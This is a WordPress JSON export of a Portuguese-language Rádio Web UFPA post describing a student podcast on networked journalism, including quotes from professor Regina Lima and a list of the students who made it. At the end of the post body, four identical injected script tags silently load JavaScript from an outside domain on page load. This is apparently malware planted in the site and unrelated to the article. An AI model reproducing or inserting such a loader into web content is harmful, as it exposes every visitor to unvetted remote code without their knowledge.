{"id":12947,"date":"2023-06-06T09:00:00","date_gmt":"2023-06-06T12:00:00","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12947"},"modified":"2025-10-21T12:59:58","modified_gmt":"2025-10-21T15:59:58","slug":"podcast-jornalismo-em-rede","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/","title":{"rendered":"Jornalismo em rede"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Jornalismo em rede&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/ESPACO-EXPERIMENTAL-PODCAST-JORNALISMO-EM-REDE-2023.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d, realizada durante a atividade curricular dos alunos e alunas da Faculdade de Comunica\u00e7\u00e3o da UFPA, para a disciplina Teoria do Jornalismo, ministrada pelo professor Leandro Lage.<\/p>\n\n\n\n<p>Mas afinal, voc\u00ea sabe o que significa Jornalismo em rede? De acordo com os especialistas, essa express\u00e3o traduz a forma em que o trabalho jornal\u00edstico pode se concretizar, diante das diversas possibilidades de comunica\u00e7\u00e3o pela Internet. Isso considerando, especialmente, o compartilhamento de not\u00edcias nas redes sociais, al\u00e9m dos &nbsp;mecanismos de busca, principais fontes de informa\u00e7\u00e3o, na atualidade.<\/p>\n\n\n\n<p>Assim, o Jornalismo em rede muda o movimento de absorver not\u00edcias e transforma o processo de distribui\u00e7\u00e3o e recep\u00e7\u00e3o pelo consumidor, em uma velocidade diferenciada. Essa quest\u00e3o apresenta consequ\u00eancias diretas para o Jornalismo. Entre elas, a facilidade em publicar nas redes virtuais, mas, tamb\u00e9m, a dissemina\u00e7\u00e3o de not\u00edcias n\u00e3o apuradas e mal contextualizadas. &nbsp;&nbsp;<\/p>\n\n\n\n<p>\u00c9 sobre todas essas quest\u00f5es, que, neste epis\u00f3dio da s\u00e9rie Jornalismo em Pauta, as estudantes Gabrielly Chagas e Victoria Rodrigues conversam com a jornalista e professora Regina Lima. As principais mudan\u00e7as na \u00e1rea da comunica\u00e7\u00e3o, a evolu\u00e7\u00e3o das redes sociais e as descontinuidades nas pr\u00e1ticas jornal\u00edsticas est\u00e3o em pauta no programa.&nbsp;<\/p>\n\n\n\n<p>\u201cA grande quest\u00e3o com a Internet \u00e9 que ela faz essa ruptura e mistura. Ela tira dos grandes meios de comunica\u00e7\u00e3o o poder que era \u00fanico de produ\u00e7\u00e3o de informa\u00e7\u00e3o, de not\u00edcia. Ent\u00e3o, agora, com a Internet,  qualquer pessoa pode produzir informa\u00e7\u00e3o\u201d, ressalta a professora Regina Lima.<\/p>\n\n\n\n<p>Ela destaca, ainda, que o Jornalismo em rede trabalha alinhado ao conceito de converg\u00eancia, um dos principais fen\u00f4menos comunicacionais da contemporaneidade. E essa converg\u00eancia midi\u00e1tica pode ser facilmente percebida pelos conte\u00fados multim\u00eddia, que combinam imagens, sons, textos e \u00e1udios em poucos minutos na tela do celular, prescindindo a necessidade de ligar a televis\u00e3o ou o aparelho f\u00edsico do r\u00e1dio. &nbsp;<\/p>\n\n\n\n<p>\u201cO podcast \u00e9 a configura\u00e7\u00e3o do r\u00e1dio nesse momento contempor\u00e2neo em que a gente est\u00e1 vivendo. Ainda que seja um ve\u00edculo de transporte de informa\u00e7\u00e3o antigo, ele pode se reformular, se reconfigurar dentro desse aspecto da contemporaneidade e pode veicular via internet aquilo que era mais dif\u00edcil, um \u00e1udio para algu\u00e9m escutar pela internet. Ent\u00e3o voc\u00ea tem o podcast que \u00e9 radiof\u00f4nico mas que pode entrar com imagens\u201d, completa a professora.<\/p>\n\n\n\n<p>O podcast Jornalismo em rede \u00e9 uma produ\u00e7\u00e3o dos estudantes da turma de Jornalismo 2022: C\u00e9sar Vieira, Gabrielly Chagas, Giovana Rodrigues, Roberta Oliveira, Victoria Rodrigues, Rafael Arcanjo e Deivid Martins. Para conhecer um pouco mais sobre as transforma\u00e7\u00f5es do Jornalismo nas redes sociais e entender melhor como esse processo tem modificado a produ\u00e7\u00e3o e a circula\u00e7\u00e3o de not\u00edcias, n\u00e3o perca o quarto epis\u00f3dio da s\u00e9rie Jornalismo em Pauta.<\/p>\n\n\n\n<p>Reportagem: Denily Carvalho<\/p>\n\n\n\n<p>Ou\u00e7a tamb\u00e9m: <\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-a-natureza-da-relacao-entre-jornalismo-e-realidade\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-a-natureza-da-relacao-entre-jornalismo-e-realidade\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/jornalistas-e-as-empresas-de-jornalismo\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Jornalismo em rede\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\" aria-label=\"Read more about Jornalismo em rede\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13364,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-12947","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Jornalismo em rede - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jornalismo em rede - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-06T12:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:59:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"502\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Jornalismo em rede\",\"datePublished\":\"2023-06-06T12:00:00+00:00\",\"dateModified\":\"2025-10-21T15:59:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\"},\"wordCount\":560,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\",\"name\":\"Jornalismo em rede - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1\",\"datePublished\":\"2023-06-06T12:00:00+00:00\",\"dateModified\":\"2025-10-21T15:59:58+00:00\",\"description\":\"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1\",\"width\":900,\"height\":502,\"caption\":\"Jornalismo em rede\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jornalismo em rede\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Jornalismo em rede - Radio Web UFPA","description":"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/","og_locale":"pt_BR","og_type":"article","og_title":"Jornalismo em rede - Radio Web UFPA","og_description":"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-06-06T12:00:00+00:00","article_modified_time":"2025-10-21T15:59:58+00:00","og_image":[{"width":900,"height":502,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Jornalismo em rede","datePublished":"2023-06-06T12:00:00+00:00","dateModified":"2025-10-21T15:59:58+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/"},"wordCount":560,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/","name":"Jornalismo em rede - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","datePublished":"2023-06-06T12:00:00+00:00","dateModified":"2025-10-21T15:59:58+00:00","description":"Jornalismo em rede \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O trabalho faz parte da s\u00e9rie \u201cJornalismo em Pauta\u201d","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","width":900,"height":502,"caption":"Jornalismo em rede"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-jornalismo-em-rede\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Jornalismo em rede"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/06\/2017-02-23_redes-sociais-jornalistas.jpg?fit=900%2C502&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3mP","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12947"}],"version-history":[{"count":19,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12947\/revisions"}],"predecessor-version":[{"id":17795,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12947\/revisions\/17795"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13364"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}